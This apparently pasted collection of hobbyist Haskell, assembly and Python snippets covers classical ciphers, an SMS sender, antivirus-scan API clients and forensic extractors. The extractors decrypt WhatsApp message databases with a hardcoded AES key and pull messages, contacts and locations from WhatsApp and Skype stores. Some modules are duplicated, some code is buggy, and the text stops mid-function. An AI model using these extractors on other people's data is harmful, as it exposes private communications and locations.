module Morse where
	xAbc = zip (['a'..'z']++['0'..'9']++".,?-!:;()=$@_+~# '")([".- ", "-... ", "-.-. ", "-.. ", ". ","..-. ", "--. ", ".... ", ".. ", ".--- ", "-.- ", ".-.. ", "-- ", "-. ", "--- ", ".--. ", "--.- ", ".-. ", "... ", "- ", "..- ", "...- ",".-- ", "-..- ", "-.-- ", "--.. ", "----- ",".---- ", "..--- ", "...-- ", "....- ", "..... ", "-.... ", "--... ","---.. ", "----. ", ".-.-.- ", "--..-- ", "..--.. ", "-....- ", "-.-.-- ", "---... ", "-.-.-. ", "-.--. ", "-.--.- ", "-...- ", "...-..- ", ".--.-. ","..--.- ", ".-.-. ", ".-... ", "...-.- ", "/ ", ".----. "])
	findPos list elt = [index | (index, e) <- zip [0..] list, e == elt]
	
	xEnc xs = [snd (xAbc !! (x !! 0))| x <- [findPos ([fst (xAbc !! z) | z <- [0..length xAbc]]) x | x <- xs]]
	xDec xs = [fst (xAbc !! (x !! 0))| x <- [findPos ([snd (xAbc !! z) | z <- [0..length xAbc]]) x | x <- xs]]

*Morse> xEnc "hola"
[".... ","--- ",".-.. ",".- "]
*Morse> xDec [".... ","--- ",".-.. ",".- "]
"hola"

module Cesar where
	import Data.Char
	xEnc :: String -> Int -> String
	xEnc z y = [chr ((ord x + y) `mod` 256) | x <- z]

	xDec :: String -> Int -> String
	xDec z y = [chr ((ord x - y) `mod` 256) | x <- z]

module Vigenere where
	import Data.Char
	
	xEnc :: String -> Int -> String
	xEnc xs ys = [chr ((fst(x) + snd(x)) `mod` 256)| x <- zip [ord x | x <- xs] [ord y | y <- ys]]
	
	xDec :: String -> Int -> String
	xDec xs ys = [chr ((fst(x) - snd(x)) `mod` 256)| x <- zip [ord x | x <- xs] [ord y | y <- ys]]

sReplace [] _ _ = []
sReplace sText nText final = if take (length nText) sText == nText
                        then final ++ (sReplace (drop (length nText) sText) nText final)
                       else [head sText] ++ (sReplace (tail sText) nText final)

;Script for reverse strings

segment .data
	; text to print
	output1 db 'Reversed: ', 0
	len_output1 equ $-output1
	
	
segment .bss
	;MAX LIMIT 50 bytes, 50 chars...
	msg resb 50
	lmsg resb 50
	
	;creating 2 counters
	counter resb 2
	counter2 resb 2
	
segment .text
	
	global _start
	_start:
		mov eax, 3 					;sys_read
		mov ebx, 0
		
		mov ecx, msg 				;leyendo input
		mov byte [counter], 0x30	;counter as 0
		mov byte [counter2], 0x30	;counter as 0
		mov edx, 50				
		mov esi, lmsg
		int 0x80 					;call kernel
		
		
	_loop:
		cmp byte [ecx], 0x00		;comparing [ecx] 
		je _reverse					;jumping to reverse function
		inc ecx
		inc byte [counter]
		inc byte [counter2]
		jmp _loop					;repeating
		
		
	_reverse:
		cmp byte [counter2], 0x30	;comparing counter2
		je _output					;jumping to output function
		mov al, [ecx-1]				;last letter of msg
		mov [esi], al				;operation origin
		
		dec byte [counter2]			;counter2 - 1
		dec ecx						;ecx(msg) - 1
		inc esi						;esi + 1
		jmp _reverse				;repeating
		
		
	_output:
		int 0x80					;call kernel
		mov eax, 4					;sys_write
		mov ebx, 1					;stdin
		mov ecx, output1			;printing output
		mov edx, len_output1		;length of msg
		
		int 0x80
		mov eax, 4
		mov ebx, 1
		mov byte [esi+1], 0xA
		mov ecx, lmsg
		mov edx, 50d
		int 0x80
		
		mov eax, 1					;sys_exit
		int 0x80

import string
xAbc = string.ascii_lowercase + '-'

def solitario(texto, ristra, opt):
    nText = [xAbc.find(x) + 1 for x in texto.lower()]
    nRistra = [xAbc.find(x) + 1 for x in ristra.lower()]
   
    if opt == 1:
        print "".join([xAbc[x - 1].replace('-', ' ') for x in [(nText[x] + nRistra[x]) % 26 for x in range(len(texto))]])

    elif opt == 0:
        print "".join([xAbc[x - 1].replace('-', ' ') for x in [(nText[x] - nRistra[x]) % 26 for x in range(len(texto))]])
       
#encoded output -> oexwa khqtw
#decoded output -> donot usepc

def progresivo(s, n, o):
    encoded = [ord(s[0]) + n,]
    decoded = [ord(s[0]) - n,]
     
    if o == 1:
        for i in s[1::]:
            encoded.append(ord(i) + encoded[-1])
         
        print "".join([unichr(x) for x in encoded])
     
    elif o == 0:
        for i in s[1::]:
            decoded.append(ord(i) - decoded[-1])
             
        print "".join([unichr(x) for x in decoded])
 
#Params: s = Texto a cifrar o descifrar | n = key | o = 1 -> cifrar, o = 0 -> descifrar
#progresivo('sanko', 2, 1) -> output example uÖńƯȞ

#Params | x = texto a cifrar | si z es 1 -> cifrar , cualquier otro valor -> descifrar
print "".join((lambda x, z: [unichr(int(i[2]+i[0]+i[1])) if z == 1 else unichr(int(i[1]+i[2]+i[0])) for i in ['{0:03}'.format(ord(z)) for z in x]])('hola', 1))

xAbc = 'LUCIFER213'
 
def xEnc(s, n):
    print "".join([xAbc[int(x)] for x in [z for z in "".join(['{0:03}'.format((ord(a) + n)) for a in s])]])
     
 
def xDec(s, n):
    print "".join(chr(int("".join([str(xAbc.find(x)) for x in s[i:i+3]]))-n) for i in range(0,len(s),3))
     
#xEnc('Hola puta.', 20)
#xDec('L3CUIUUC1UU2LECUICUI2UIRUU2LRR', 20)

import pycurl, cStringIO, json
class Anonfiles:
	
	def _upload(self, sFilename):
		self.sFilename = sFilename
		
		storage = cStringIO.StringIO()
		PostFileStorage = cStringIO.StringIO()

		curl = pycurl.Curl()
		postData=[('file', (pycurl.FORM_FILE, sFilename))]
		
		try:
			curl.setopt(curl.WRITEFUNCTION, storage.write)
			curl.setopt(curl.COOKIEFILE, '')
			curl.setopt(curl.URL, 'https://anonfiles.com/api')
			curl.setopt(curl.HTTPPOST, postData)
			curl.setopt(curl.WRITEFUNCTION, PostFileStorage.write)
			curl.perform()
			
		except:
			self.upload_data = "An error has ocurred uploading the file"
			
		self.upload_data = json.loads(PostFileStorage.getvalue())
		print self.upload_data["url"]

#ByteScanner "API" coded by YAKIT
#code debugging / improved code / by Sanko

import pycurl, cStringIO, errno, sys, hashlib, json

#Defining Buffers
storage = cStringIO.StringIO()
PostFileStorage = cStringIO.StringIO()
ScanResultStorage = cStringIO.StringIO()
ScanHistoryStorage = cStringIO.StringIO()
ChangeLogStorage = cStringIO.StringIO()
AVersionStorage = cStringIO.StringIO()

#Defining curl
curl = pycurl.Curl()
curl.setopt(curl.WRITEFUNCTION, storage.write)
curl.setopt(curl.COOKIEFILE, '')

class bs_Api():
	
	def __init__(self):
		"""
		self.__login('[email protected]', 'yourpassword')
		self.__upload_file('test.exe')
		self.__Result_ID(id)
		self.__Scan_History()
		self.__Change_Log()
		self.__Check_AV_Version()
		self.__Export_to('extension', id)
		"""
	def __login(self, email, password):
		#trying to log in
		try:
			curl.setopt(curl.URL, 'http://www.bytescanner.com/client2api.php')
			curl.setopt(curl.POSTFIELDS, 'action=Auth&email=%s&password=%s'%(email, password))
			curl.perform()
			#storing the json data returned like login_data
			self.login_data = json.loads(storage.getvalue())
			
		except:
			print "An error has ocurred triying to log in bytescanner"
			
		#checking if you are logged
		if self.login_data['success'] == False:
			print ("[x] "+self.login_data['error']['title'] + "\tReason: " + self.login_data['error']['reason'])
			sys.exit(errno.EACCES)
			
		self.dicc_login = {"ID":self.login_data['root'][0]['id'],
						   "Email":self.login_data['root'][0]['email'],
						   "Creation Date":self.login_data['root'][0]['created'],
						   "Last Login":self.login_data['root'][0]['lastlogin'],
						   "Last IP Logged":self.login_data['root'][0]['lastloginip']}
		#print self.dicc_login
				
	def __upload_file(self, sFilename):
		#reading the file to upload
		try:
			with open(sFilename): pass
			
		except IOError:
			print "Unable to open %s" % sFilename
			
		postData=[('action', 'BinaryFileTransfer'),
				  ('binaryFile', (pycurl.FORM_FILE, sFilename))]
				  
		try:
			curl.setopt(curl.URL, 'http://www.bytescanner.com/startup.php')
			curl.setopt(curl.HTTPPOST, postData)
			curl.setopt(curl.WRITEFUNCTION, PostFileStorage.write)
			curl.perform()
			self.upload_data = json.loads(PostFileStorage.getvalue())
			
		except:
			print "An error has ocurred uploading the file"
			
		#checking
		if self.upload_data['success'] != True:
			print ("[x] "+self.upload_data['error']['title'] + "\tReason: " + self.upload_data['error']['reason'])
			sys.exit(errno.EACCES)
			
		self.dicc_upload = {"Result ID":str(self.upload_data['root']),
							"MD5":hashlib.md5(open(sFilename).read()).hexdigest(),
							"SHA1":hashlib.sha1(open(sFilename).read()).hexdigest()}
		#print self.dicc_upload
		
	def __Result_ID(self, r_ID):
		#obtaining json result
		try:
			curl.setopt(curl.URL, 'http://www.bytescanner.com/api2client.php?action=scanResult&ResultID=%s'% r_ID)
			curl.setopt(curl.WRITEFUNCTION, ScanResultStorage.write)
			curl.perform()
			self.result_data = json.loads(ScanResultStorage.getvalue())
			
		except:
			print "An error has ocurred obtaining the json data"
			
		#checking
		if self.result_data['success'] != True:
			print ("[x] "+self.result_data['error']['title'] + "\tReason: " + self.result_data['error']['reason'])
			sys.exit(errno.EACCES)
		
		#print self.result_data
		
	def __Scan_History(self):
		try:
			curl.setopt(curl.URL, 'http://www.bytescanner.com/api2client.php?action=ScanHistory')
			curl.setopt(curl.WRITEFUNCTION, ScanHistoryStorage.write)
			curl.perform()
			self.history_data = json.loads(ScanHistoryStorage.getvalue())
			
		except:
			print "An error has ocurred obtaining your Scan History"
			
		#print self.history_data
			
	def __Change_Log(self):
		try:
			curl.setopt(curl.URL, 'http://www.bytescanner.com/api2client.php?action=ChangeLog')
			curl.setopt(curl.WRITEFUNCTION, ChangeLogStorage.write)
			curl.perform()
			self.ChangeLog_data = json.loads(ChangeLogStorage.getvalue())
			
		except:
			print "An error has ocurred obtaining the ChangeLog"
			
		#print self.ChangeLog_data
		
	def __Check_AV_Version(self):
		try:
			curl.setopt(curl.URL, 'http://www.bytescanner.com/api2client.php?action=AvVersion')
			curl.setopt(curl.WRITEFUNCTION, AVersionStorage.write)
			curl.perform()
			self.AVersion_data = json.loads(AVersionStorage.getvalue())
			
		except:
			print "An error has ocurred obtaining the ChangeLog"
		
		#print self.AVersion_data
				
	def __Export_to(self, ext_to, r_ID):
		buf = cStringIO.StringIO()
		ext_dicc = {'png':'Png', 'xls':'Excel', 'pdf':'Pdf'}
		
		try:
			curl.setopt(curl.URL, 'http://www.bytescanner.com/export4client.php?action=Export2%s&ResultID=%s' %(ext_dicc[ext_to], r_ID))
			curl.setopt(curl.WRITEFUNCTION, buf.write)
			f = open('bs_report.%s'%(ext_to), 'w')
			f.write(curl.perform())
			f.close()
			
		except:
			print "An error has ocurred saving the %s report" % ext_dicc[ext_to]

#Author: Ersan YAKIT
#Email : [email protected]

import pycurl, json
import cStringIO
import errno, sys

storage = cStringIO.StringIO()
PostFileStorage = cStringIO.StringIO()
ScanResultStorage = cStringIO.StringIO()

BYTESCANNER_EMAIL= "[email protected]"
BYTESCANNER_PASSWORD= "yourbytescannerpassword"

c = pycurl.Curl()
c.setopt(c.WRITEFUNCTION, storage.write)
c.setopt(c.COOKIEFILE, '') #we want to store cookie into memory

#STEP I ( Login into system )
c.setopt(c.URL, 'http://www.bytescanner.com/client2api.php')
c.setopt(c.POSTFIELDS, 'action=Auth&email='+BYTESCANNER_EMAIL+'&password='+ BYTESCANNER_PASSWORD)
c.perform()

data = json.loads(storage.getvalue())

if data['success'] != True:
	print ("[x] "+data['error']['title'] + "\tReason: " + data['error']['reason'])
	sys.exit(errno.EACCES)

print ("[+] Logged In\n")
print("Welcome, "+data['root'][0]['email']+"\nLast Login: "+ data['root'][0]['lastlogin']+"\nLast Login Ip: "+ data['root'][0]['lastloginip']+"\n" )


#STEP II ( Get File Name from user. )
scanFile= raw_input("Enter Scan File Path: ")
try:
	with open(scanFile): pass
except IOError:
	print 'Unable to open :'+scanFile
print("[+] Transfering file "+ scanFile +"\n")
## sending File To server!
postData=[
	('action', 'BinaryFileTransfer'),
	('binaryFile', (pycurl.FORM_FILE, scanFile))
]
c.setopt(c.URL, 'http://www.bytescanner.com/startup.php')
c.setopt(c.HTTPPOST, postData)
c.setopt(c.WRITEFUNCTION, PostFileStorage.write)
c.perform()
data = json.loads(PostFileStorage.getvalue())
if data['success'] != True:
	print ("[x] "+data['error']['title'] + "\tReason: " + data['error']['reason'])
	sys.exit(errno.EACCES)
print("[+] File transfer completed. Result ID: "+str(data['root']) )

#STEP III recieve scan results
print("[+] Starting request for scan results...\n");

c.setopt(c.URL, 'http://www.bytescanner.com/api2client.php?action=scanResult&ResultID='+str(data['root']) )
c.setopt(c.WRITEFUNCTION, ScanResultStorage.write)
c.perform()

data = json.loads(ScanResultStorage.getvalue())
if data['success'] != True:
	print ("[x] "+data['error']['title'] + "\tReason: " + data['error']['reason'])
	sys.exit(errno.EACCES)
print ('{0:30}\t{1:40}\t{2:30}\t{3:30}\n'.format("Antivirus Provider", "Antivirus Ver", "Scan Time", "Scan Result"))

for tmpIndex in data['root']:
	print ('{0:30}\t{1:40}\t{2:30}\t{3:30}'.format(
		tmpIndex['malwareScanProvider'],  
		tmpIndex['malwareScanProviderVer'],
		tmpIndex['malwareScanProviderResultTime'], tmpIndex['malwareScanProviderResult']
	))

storage.close()
PostFileStorage.close()
ScanResultStorage.close()
print("[+] Scan Completed...\n")

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Cifrado Vigenere en Python - Sanko
# Yi = (Xi + Zi) % 27

class cif_Vigenere():
	
	def __init__(self):
		self.abecedario = 'ABCDEFGHIJKLMNÑOPQRSTUVWXYZ'
		self.__encode("P A R I S  V A U T  B I E N", "L O U P L  O U P L  O U P L")
		self.__decode("A O N X D  L U L E  P C T W", "L O U P L  O U P L  O U P L")
		
	def __encode(self, text, key):
		encoded = ''
		counter = 0
		
		text = text.upper()
		key = key.upper()
				
		for i in range(len(text)):

			if counter > len(key) - 1:
				counter = 0	
			
			if text[i] == ' ':
				encoded += '5'.replace('5', ' ')
				counter += 1
				
			else:
				resultado = (self.abecedario.index(text[i]) + self.abecedario.index(key[counter]) + 1) % len(self.abecedario) - 1	
				encoded += self.abecedario[resultado]
				counter += 1
				
		print encoded
		
	
	def __decode(self, enc_text, key):
		decoded = ''
		counter = 0
		
		key = key.upper()
		
		for i in range(len(enc_text)):
			if counter > len(key) - 1:
				counter = 0
				
			if enc_text[i] == ' ':
				decoded += '5'.replace('5', ' ')
				counter +=1
	
			else:
				resultado = (self.abecedario.index(enc_text[i]) - self.abecedario.index(key[counter]) + 1) % len(self.abecedario) - 1
				decoded += self.abecedario[resultado]
				counter += 1
				
		print decoded
		
cif_Vigenere()

# Cifrado Morse.py - Sanko
# -*- coding: utf-8 -*- 

class cif_morse():
	
	def __init__(self):
		self.table = {'A':'.-', 'B':'-...', 'C':'-.-.',
					  'D':'-..', 'E':'.', 'F':'..-.', 'G':'--.',
					  'H':'....', 'I':'..', 'J':'.---', 'K':'-.-', 
					  'L':'.-..', 'M':'--', 'N':'-.', 'Ñ':'--.--',
					  'O':'---', 'P':'.--.', 'Q':'--.-', 'R':'.-.',
					  'S':'...', 'T':'-', 'U':'..-', 'V':'...-',
					  'W':'.--', 'X':'-..-', 'Y':'-.--', 'Z':'--..',
					  'Ä':'.-.-', 'Ö':'---.', 'Ü':'..--', '0':'-----',
					  '1':'.----', '2':'..---', '3':'...--', '4':'....-',
					  '5':'.....', '6':'-....', '7':'--...', '8':'---..',
					  '9':'----.', '.':'.-.-.-', ',':'--..--', '?':'..--..',
					  '!':'..--.', ':':'---...', '"':'.-..-.', "'":".----.",
					  '=':'-...-', ' ':' '}
		
		self.table2 = {}
		
		# Inicializar desde aqui
		self.__encode('Sanko os saluda')
		self.__decode('... .- -. -.- ---   --- ...   ... .- .-.. ..- -.. .-')	


		
	def __encode(self, text):
		self.text = text
		self.encoded = ''
		
		if self.text != '':
			self.text = self.text.upper()
			
			for i in self.text:
				self.encoded += self.table[i] + ' '
				
			print "Encoded: %s"% self.encoded
			

		
	def __decode(self, en_text):		
		self.en_text = en_text
		self.decoded = ''
		
		for i in self.table:
			self.table2[self.table[i]] = i
		
		self.en_text = self.en_text.split(' ')

		for x in self.en_text:
			try:
				self.en_text.remove('')
			except:
				pass
			self.decoded += self.table2[x]
			
		print "Decoded: %s"% self.decoded
						
cif_morse()

#Cifrado Kamasutra en Python - Sanko
#Reto UDT - Cifrado Kamasutra

# -*- coding: utf-8 -*- 
from random import randint
from string import maketrans

class cif_Kamasutra():
	
	def __init__(self):
		self.text = raw_input("Write the text to encode|> ")
		self.text = self.text.upper()
		self._gen_alfabeto()
		
	def _gen_alfabeto(self):
		#This func has been coded by Pink
		self.alfabeto = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
		letra1=""
		letra2=""
		self.retorno=""
		
		for n in range(len(self.alfabeto)):
			ram = randint(0,len(self.alfabeto)-1)
			letra1 = self.alfabeto[ram]
			letra2 = self.alfabeto[n]
			self.alfabeto[n] = letra1
			self.alfabeto[ram] = letra2
			
		for n in range(len(self.alfabeto)):
			self.retorno+=self.alfabeto[n]
		
		#extra code
		print "\nDict: %s"% self.retorno
		self.new_alphabet = self.retorno[::-1]

		self.__encode()
		self.__decode()
		
	def __encode(self):
		self.encoded = maketrans(self.retorno, self.new_alphabet)
		self.final_str = self.text.translate(self.encoded)
		print "Encoded: ", self.text.translate(self.encoded)
		
	def __decode(self):
		decoded = maketrans(self.new_alphabet, self.retorno)
		print "Decoded: ", self.final_str.translate(decoded)
		

cif_Kamasutra()

#Cifrado escitala en python - Sanko
#Reto cifrado escitala - udtools.net

# -*- coding: utf-8 -*- 

from math import ceil

class cif_escitala():
	
	def __init__(self):
		self.table = []
		self.main()
		
	def main(self):
		print "Escitala cipher Python\n"
		self.text = raw_input("Write the text to encode|> ")
		self.n_col = input("\nWrite the number of columns|> ")
		
		if self.text != '' and self.n_col != '':
			self.__encode(self.text, self.n_col)
			self.__decode()
			
			print "\nNumber of columns: %s" % self.n_col
			print "Encoded: %s" % self.encoded
			print "Decoded: %s" % self.decoded
	
	def __encode(self, text, n_col):
		longitud = len(self.text)
		if longitud > self.n_col:
			h = ceil(longitud / self.n_col)
			while h:
				self.table.append(self.text[:self.n_col])
				self.text = self.text[self.n_col:]
				h -= 1
				
			self.table.append(self.text.ljust(self.n_col))
			self.text = ''.join(map(''.join, zip(*self.table)))
		else:
			print "n_col is bigger than longitud"
			
		self.encoded = self.text.rstrip()
		
	def __decode(self):
		self.decoded = self.__encode(self.encoded, ceil(len(self.encoded) / self.n_col))
		
		
cif_escitala()

# m.24sms.net app to send sms
# Coded by Sanko

import urllib, urllib2
from cookielib import CookieJar

class SMS_Sender():

    def __init__(self):
        self._Responser()

    def _Responser(self):
        self.__Params('Sanko', 'Aqui tu prefijo + numero de telefono')
        #
        try:
            data_encoded = urllib.urlencode(self.data)
            response = self.opener.open("http://m.24sms.net/", data_encoded)
            content = response.read()
        except:
            print "Error doing the response"

        def __Parser():
            if content == "Site is doing maintenance,please come back later.":
                print "ERROR sending the SMS"
            else:
                print "the SMS was sent correctly!"

        __Parser()

    def __Params(self, author, number):
        self.author = author
        self.number = number

        #capturing the cookies
        try:
            cj = CookieJar()
            self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        except:
            print "An error has ocurred capturing the cookies"
        #params
        self.data = {'al':1064, 'SendFrom':self.author, 'SendTo':self.number,
                'Msg':'Probando sms app - Sanko', 'submit':'Send'}


SMS_Sender()

· WhatsApp Metadata Extractor :
       - main_manage.py (main de consola en forma de cliente)
       - DB_Extractor.py (extrae los metadatos de la BD)
       - metaimg_extractor.py (extrae los metadatos de los .jpg encontrados)

# -*- coding: utf-8 *-*
import DB_Extractor, metaimg_extractor

class WhatsApp_Extractor():

    def __init__(self):
        self.__opt()

    def __opt(self):
        #Uncomment the OPTION that you want to use

        #self.__opt1()  #-> DB METADATA EXTRACTOR
        self.__opt2()  #-> IMG METADATA EXTRACTOR
        #self.__opt3()  #-> BOTH, OPT1 AND OPT2

    def __opt1(self):
        print "DB METADATA"
        print "------------"
        DB_Extractor.DB_Extractor()
        print "------------"

    def __opt2(self):
        print "IMG META"
        print "------------"
        metaimg_extractor.IMG_Meta()
        print "------------"

    def __opt3(self):
        print "DB METADATA"
        print "------------"
        DB_Extractor.DB_Extractor()
        print "------------"
        print "\nIMG META"
        print "------------"
        metaimg_extractor.IMG_Meta()
        print "------------"

WhatsApp_Extractor()

# -*- coding: utf-8 *-*
#Script to extract the metadata from the WhatsApp crypted DB

import sqlite3
from Crypto.Cipher import AES

class DB_Extractor():

    def __init__(self):
        self._manage_do()

    def _manage_do(self):
        try:
            self.__DB_Breaker('msgstore.db.crypt')
            self.__DB_conn()
            self.__SQL_Consulter()
            #Log exporter
        except:
            print "Error starting the script"

    def __DB_Breaker(self, DBPath):
        self.DBPath = DBPath
        #breaking the hash
        f = open(self.DBPath, 'rb')
        key = "346a23652a46392b4d73257c67317e352e3372482177652c"
        #triying to break the hash
        try:
            key = key.decode('hex')
            cipher = AES.new(key, 1)
            decoded = cipher.decrypt(f.read())
            #Saving into a new db file
            try:
                decoded_DB = open('metadb.db', 'wb')
                decoded_DB.write(decoded)
                decoded_DB.close()
                print "metadb.db has been created in the same directory"
            except:
                print "An error has ocurred creating the decoded DB"
        except:
            print "Error decoding the hash"


    def __DB_conn(self):
        #triying to connect with the sqlite database
        try:
            self.conn = sqlite3.connect('metadb.db')
            self.consult = self.conn.cursor()
        except:
            print "An error has ocurred connecting with the SQLite DB"


    def __SQL_Consulter(self):
        #Divided in :
            # Messages
            # Chat_list

        def __Messages():
            #SQLConsult
            try:
                self.consult.execute("SELECT key_remote_jid, key_from_me, \
                remote_resource, status, datetime(timestamp), data, media_url, media_mime_type, \
                media_size, latitude, longitude FROM messages;")

            except:
                print "An error has ocurred doing the SQL Consult"

            def __Shower():
                #Message details
                #nota : parsear status, comprobar si yo envio o recivo

                for data in self.consult:
                    try:
                        print "\nMessages Details:"
                        print "----------------------"

                        if str(data[2]):
                            if str(data[1]) == '1':
                                print "From: me"
                                print "To: %s(group), integrant: %s"%(str(data[0]), str(data[2]))
                            else:
                                print "From: %s(group), integrant: %s"%(str(data[0]), str(data[2]))
                                print "To: me"
                        else:
                            if str(data[1]) == '1':
                                print "From: me"
                                print "To: " + str(data[0])
                            else:
                                print "From: " + str(data[0])
                                print "To: me"

                        print "Status: " + str(data[3])
                        print "Timestamp: " + str(data[4])
                        print "Message: " + str(data[5])
                        print "Media content: %s, type: %s, size: %s"%(str(data[6]), str(data[7]), str(data[8]))
                        print "Location(Lat: %s, Long: %s)"%(str(data[9]), str(data[10]))
                        print "----------------------"

                    except:
                        continue
                        print "ERROR showing message details"

            __Shower()


        def __Chat_list():
            #SQLConsult
            try:
                self.consult.execute("SELECT id, \
                key_remote_jid FROM chat_list;")

            except:
                print "An error has ocurred doing the SQL Consult"

            def __Shower():
                #Chat list details
                for data in self.consult:
                    try:
                        print "\nChat_list"
                        print "ID: " + str(data[0])
                        print "Number: " + str(data[1])
                        print "----------------------"
                    except:
                        continue
                        print "ERROR showing chat list details"

            __Shower()

        #Initializing
        __Messages()
        __Chat_list()

# -*- coding: utf-8 *-*
import os, exif

class IMG_Meta():

    def __init__(self):
        try:
            self.__Media_extractor()
            print "------------------------------------------------------\n"
            self.__Profile_extractor()
        except:
            print "An error has ocurred starting the script"
    def __Media_extractor(self):
        try:
            images = os.listdir('Media/WhatsApp Images/')
        except:
            print "An error has ocurred listing the files into the directory"

        def __Shower():
            for i in images:
                print "-------------"
                print i
                obj = exif.extract_EXIF('Media/WhatsApp Images/%s' % i)
                print "-------------"

        __Shower()

    def __Profile_extractor(self):
        try:
            images = os.listdir('Profile Pictures/')
        except:
            print "An error has ocurred listing the files into the directory"

        def __Shower():
            for i in images:
                print "-------------"
                print i
                obj = exif.extract_EXIF('Profile Pictures/%s' % i)
                print "-------------"

        __Shower()

# -*- coding: utf-8 *-*
import DB_Extractor, metaimg_extractor

class WhatsApp_Extractor():

    def __init__(self):
        self.__opt()

    def __opt(self):
        #Uncomment the OPTION that you want to use

        #self.__opt1()  #-> DB METADATA EXTRACTOR
        self.__opt2()  #-> IMG METADATA EXTRACTOR
        #self.__opt3()  #-> BOTH, OPT1 AND OPT2

    def __opt1(self):
        print "DB METADATA"
        print "------------"
        DB_Extractor.DB_Extractor()
        print "------------"

    def __opt2(self):
        print "IMG META"
        print "------------"
        metaimg_extractor.IMG_Meta()
        print "------------"

    def __opt3(self):
        print "DB METADATA"
        print "------------"
        DB_Extractor.DB_Extractor()
        print "------------"
        print "\nIMG META"
        print "------------"
        metaimg_extractor.IMG_Meta()
        print "------------"

WhatsApp_Extractor()

# -*- coding: utf-8 *-*
#Script to extract the metadata from the WhatsApp crypted DB

import sqlite3
from Crypto.Cipher import AES

class DB_Extractor():

    def __init__(self):
        self._manage_do()

    def _manage_do(self):
        try:
            self.__DB_Breaker('msgstore.db.crypt')
            self.__DB_conn()
            self.__SQL_Consulter()
            #Log exporter
        except:
            print "Error starting the script"

    def __DB_Breaker(self, DBPath):
        self.DBPath = DBPath
        #breaking the hash
        f = open(self.DBPath, 'rb')
        key = "346a23652a46392b4d73257c67317e352e3372482177652c"
        #triying to break the hash
        try:
            key = key.decode('hex')
            cipher = AES.new(key, 1)
            decoded = cipher.decrypt(f.read())
            #Saving into a new db file
            try:
                decoded_DB = open('metadb.db', 'wb')
                decoded_DB.write(decoded)
                decoded_DB.close()
                print "metadb.db has been created in the same directory"
            except:
                print "An error has ocurred creating the decoded DB"
        except:
            print "Error decoding the hash"


    def __DB_conn(self):
        #triying to connect with the sqlite database
        try:
            self.conn = sqlite3.connect('metadb.db')
            self.consult = self.conn.cursor()
        except:
            print "An error has ocurred connecting with the SQLite DB"


    def __SQL_Consulter(self):
        #Divided in :
            # Messages
            # Chat_list

        def __Messages():
            #SQLConsult
            try:
                self.consult.execute("SELECT key_remote_jid, key_from_me, \
                remote_resource, status, datetime(timestamp), data, media_url, media_mime_type, \
                media_size, latitude, longitude FROM messages;")

            except:
                print "An error has ocurred doing the SQL Consult"

            def __Shower():
                #Message details
                #nota : parsear status, comprobar si yo envio o recivo

                for data in self.consult:
                    try:
                        print "\nMessages Details:"
                        print "----------------------"

                        if str(data[2]):
                            if str(data[1]) == '1':
                                print "From: me"
                                print "To: %s(group), integrant: %s"%(str(data[0]), str(data[2]))
                            else:
                                print "From: %s(group), integrant: %s"%(str(data[0]), str(data[2]))
                                print "To: me"
                        else:
                            if str(data[1]) == '1':
                                print "From: me"
                                print "To: " + str(data[0])
                            else:
                                print "From: " + str(data[0])
                                print "To: me"

                        print "Status: " + str(data[3])
                        print "Timestamp: " + str(data[4])
                        print "Message: " + str(data[5])
                        print "Media content: %s, type: %s, size: %s"%(str(data[6]), str(data[7]), str(data[8]))
                        print "Location(Lat: %s, Long: %s)"%(str(data[9]), str(data[10]))
                        print "----------------------"

                    except:
                        continue
                        print "ERROR showing message details"

            __Shower()


        def __Chat_list():
            #SQLConsult
            try:
                self.consult.execute("SELECT id, \
                key_remote_jid FROM chat_list;")

            except:
                print "An error has ocurred doing the SQL Consult"

            def __Shower():
                #Chat list details
                for data in self.consult:
                    try:
                        print "\nChat_list"
                        print "ID: " + str(data[0])
                        print "Number: " + str(data[1])
                        print "----------------------"
                    except:
                        continue
                        print "ERROR showing chat list details"

            __Shower()

        #Initializing
        __Messages()
        __Chat_list()

# -*- coding: utf-8 *-*
import os, exif

class IMG_Meta():

    def __init__(self):
        try:
            self.__Media_extractor()
            print "------------------------------------------------------\n"
            self.__Profile_extractor()
        except:
            print "An error has ocurred starting the script"
    def __Media_extractor(self):
        try:
            images = os.listdir('Media/WhatsApp Images/')
        except:
            print "An error has ocurred listing the files into the directory"

        def __Shower():
            for i in images:
                print "-------------"
                print i
                obj = exif.extract_EXIF('Media/WhatsApp Images/%s' % i)
                print "-------------"

        __Shower()

    def __Profile_extractor(self):
        try:
            images = os.listdir('Profile Pictures/')
        except:
            print "An error has ocurred listing the files into the directory"

        def __Shower():
            for i in images:
                print "-------------"
                print i
                obj = exif.extract_EXIF('Profile Pictures/%s' % i)
                print "-------------"

        __Shower()

# -*- coding: utf-8 *-*
import sqlite3

class Skype_Meta_Extractor():

    def __init__(self, DBPath):
        self.DBPath = DBPath

        def __manager():
            try:
                self._Profile_Details()
                self._Conver_Details()
                self._Transfer_Details()
            except:
                print "An error has ocurred, please, try again"

        __manager()

    def __main_conn(self):
        try:
            #triying to connect with the sqlite database
            conn = sqlite3.connect(self.DBPath)
            self.consult = conn.cursor()
        except:
            print "Can't connect with the SQLite database'"

    def _Profile_Details(self):
        self.__main_conn()
        try:
            #SQL consult
            self.consult.execute("SELECT fullname, skypename, emails, country, city, languages,\
            datetime(profile_timestamp), datetime(avatar_timestamp),\
            datetime(registration_timestamp) FROM accounts;")
        except:
            print "An error has ocurred doing the SQL consult"

        def _another_info():
            try:
                #SQL consult
                self.consult.execute("SELECT phone_mobile, datetime(birthday) FROM contacts;")
            except:
                print "An error has ocurred doing the SQL consult"

            def __Shower():
                print "Extra info: "
                for data in self.consult:
                    try:
                        if data[0] and data[1]:
                            print "Phone: " + str(data[0])
                            print "Born Date: " + str(data[1])
                        else:
                            continue
                    except:
                        print "An error has ocurred showing the extra info"
                        continue

            __Shower()

        def __Shower():
            #Showing metainfo
            print "- Skype Profile Details"
            for data in self.consult:
                try:
                    print "---------------------------------------"
                    print "Full Name: " + str(data[0])
                    print "Skype Name: " + str(data[1])
                    print "Email: " + str(data[2])
                    print "Country: " + str(data[3])
                    print "City: " + str(data[4])
                    print "Language: " + str(data[5])
                    print "Last profile edition: " + str(data[6])
                    print "Last avatar edition: " + str(data[7])
                    print "Registration Date: " + str(data[8])
                    _another_info()
                    print "---------------------------------------"
                except:
                    continue
                    print "ERROR : An error has ocurred showing the profile info"

        __Shower()

    def _Conver_Details(self):
